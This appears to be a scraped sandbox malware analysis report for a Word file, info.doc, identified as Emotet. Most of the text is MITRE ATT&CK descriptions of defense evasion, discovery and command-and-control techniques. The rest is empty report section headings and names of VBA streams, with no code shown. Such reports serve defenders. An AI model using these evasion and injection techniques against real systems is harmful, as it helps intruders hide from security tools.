Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report info.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "info.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Ifll4vsaspsrsln6_, Stream Size: 14476

General

VBA Code Keywords

VBA Code

VBA File Name: Mlimulsud7q0, Stream Size: 699

General

VBA Code Keywords

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre